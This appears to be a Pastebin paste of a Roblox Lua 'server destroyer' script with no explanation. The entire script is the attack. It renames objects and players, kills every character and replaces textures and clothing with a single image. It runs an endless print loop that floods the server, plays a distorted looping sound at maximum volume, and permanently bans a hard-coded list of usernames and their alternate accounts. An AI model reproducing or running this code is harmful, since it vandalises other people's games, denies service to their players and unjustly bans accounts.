BenjiKad

Untitled

Jun 17th, 2025 (edited)
13
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.42 KB | None | 0 0
  1.  
  2. local text = '😍🥵'
  3. _G.valid = {'benjikad','bushbushboi12345','yoopery','Stoomie','Mrgesmask','theKing_Crusty'}
  4.  
  5. local items = {
  6. TextLabel = function(v)
  7. v.Text = text
  8. end,
  9. TextButton = function(v)
  10. v.Text = text
  11. end,
  12. Tool = function(v)
  13. v.Name = text
  14. end,
  15. Player = function(v)
  16. local c = v.Character
  17. if c then
  18. c.Archivable = true
  19. c.Name = text
  20. end
  21. end,
  22. Team = function(v)
  23. v.Name = text
  24. end,
  25. Model = function(v)
  26. local hum = v:FindFirstChildOfClass('Humanoid')
  27.  
  28. if hum then
  29. v.Name = text
  30. hum.Health = 0
  31. end
  32. end,
  33. Decal = function(v)
  34. v.Texture = 'rbxassetid://85320321741633'
  35. end,
  36. Texture = function(v)
  37. v.Texture = 'rbxassetid://85320321741633'
  38. end,
  39. Shirt = function(v)
  40. v.ShirtTemplate = 'rbxassetid://85320321741633'
  41. end,
  42. Pants = function(v)
  43. v.PantsTemplate = 'rbxassetid://85320321741633'
  44. end,
  45. }
  46.  
  47. spawn(function()
  48. for i,v in pairs(workspace:GetDescendants()) do
  49. local item = items[v.ClassName]
  50. if item then pcall(item,v) end
  51. end
  52.  
  53. for i,v in pairs(game:GetService('Players'):GetDescendants()) do
  54. local item = items[v.ClassName]
  55. if item then pcall(item,v) end
  56. end
  57.  
  58. for i,v in pairs(game:GetService('Teams'):GetDescendants()) do
  59. local item = items[v.ClassName]
  60. if item then pcall(item,v) end
  61. end
  62. end)
  63.  
  64. spawn(function()
  65. while wait() do
  66. for i=1,10000000000 do
  67. print(string.rep('hi',math.random(1,1000)))
  68. end
  69. end
  70. end)
  71.  
  72. local sound = Instance.new('Sound',game:GetService('SoundService'))
  73. sound.SoundId = 'rbxassetid://85271883712040'
  74. sound.Volume = 10
  75. sound.Looped = true
  76. local dist = Instance.new('DistortionSoundEffect',sound)
  77. dist.Level = 1
  78.  
  79. sound:Play()
  80.  
  81. for i,v in _G.valid do
  82. local id = game:GetService('Players'):GetUserIdFromNameAsync(v)
  83.  
  84. local c = {
  85. UserIds = { id },
  86. Duration = -1, -- 24‑hour ban; use -1 for permanent
  87. DisplayReason = "STOP",
  88. PrivateReason = '',
  89. ExcludeAltAccounts = false, -- default: bans suspected alts
  90. ApplyToUniverse = true,
  91. }
  92.  
  93. -- Attempt to ban
  94. local ok, err = pcall(function()
  95. game:GetService("Players"):BanAsync(c)
  96. end)
  97. end
Advertisement
Add Comment
Please, Sign In to add comment